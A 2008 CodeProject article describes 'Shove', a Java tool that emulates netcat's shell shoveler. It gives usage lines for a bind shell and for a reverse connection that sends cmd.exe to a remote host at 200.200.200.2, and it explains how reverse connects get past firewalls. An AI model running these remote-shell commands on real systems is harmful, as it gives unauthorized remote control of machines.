Click here to Skip to main content
65,938 articles
CodeProject is changing. Read more.
Articles
 
(untagged)

Shove - Shell Shoveler

0.00/5 (No votes)
1 Mar 2008 1  
Emulate the NetCat Feature.

DISCLAIMER

This Tool was not designed for Malicious Intent. By Using this tool you agree and acknowledge the author (me) does not hold any responsibilty for it's use. This Tool comes with ABSOLUTELY NO WARRANTY. Use at your Own Risk...

Introduction

The Article discusses The Working of an application Shoveller...The Program is called "Shove" and it emulates a netCat (nc.exe) feature called a "Shell Shoveler". Allows a User to Access the Command Prompt (or any console application) of a Remote Machine.

Background

The Following Code also Uses I/O Streams, Sockets, Binding Ports, and The Reverse Connect Back Method...The Reader is Assumed to know what they mean.

How to Build 

	javac interfaceShove.java StreamShovel.java ShoveWrap.java Shove.java

How to Use Shove

Unless you make a jar file...you have to run shove by the following (make sure all "class" files are in same dir) 

usage: Shove [-pPORT] [-aAPPLICATION] [-hREMOTEHOST]

1) Bind Shell 

c:\[DIR]>java -classpath . Shove 
//runs in default config (bindshell 7978)

c:\[DIR]>java -classpath . Shove -p53
//(bindshell 53)

2) Reverse Connect 

c:\[DIR]>java -classpath . Shove -p90 -acmd.exe -h200.200.200.2
//repeatedly connects to 200.200.200.2 at port 90. if success shovels a shell 
//on your machine "nc -l -p90"

Why Reverse Connect Method?

The Reverse Connect Method is Used to Circumvent Firewalls, NAT Traversal, etc. Since Our Incoming Attempts to connect to the host will fail in case of a firewall, we ask the host to connect to us (since the firewall "should" allow outgoing connections). It's Usually used in Exploits. But, For shove it has to be manually set up. So you don't need to add new Rules to your Firewall and compromise.

How it Works?

For Every Process there are 3 Streams Stdin,StdOut,StdErr .
For a Console Application, The Stdin refers to Keyboard input. The StdOut and StdErr Point the Console Window. There are Methods of Redirecting the Streams to Different Streams For eg. ( dir *.* > list.txt )
This way The Output Stream (stdout,stderr) are redirected to the file input stream (list.txt). In a Similar way, Sockets have an InputStream and an OutputStream. Shove Simply redirects the OutputStream of The Socket to the InputStream of The Process (Stdin) and InputStream of The Socket to OutputStream of the Process (stdout,stderr). So when the socket recieves the data, it is sent to the process, the output from the process is sent back through the socket to a remote user...

Points of Interest

The Utility is Inspired from a Single Feature of NetCat (by Hobbit) - The Swiss Army Knife of Networking.

Author's Notes

Now, java programs are supposed to be platform independent,but I don't have Access to another OS to test it out, but i'm curious to whether it will work on any other OS. So I request people of CP to test it out and post their feedback.

History

Original Draft : 2 March 2008

License

This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.

A list of licenses authors might use can be found here



Permalink

Privacy
Cookies
Terms of Use
Layout: fixed | fluid

Article Copyright 2008 by st0le
Everything else Copyright © CodeProject, 1999-2025

Web01 2.8:2024-12-08:1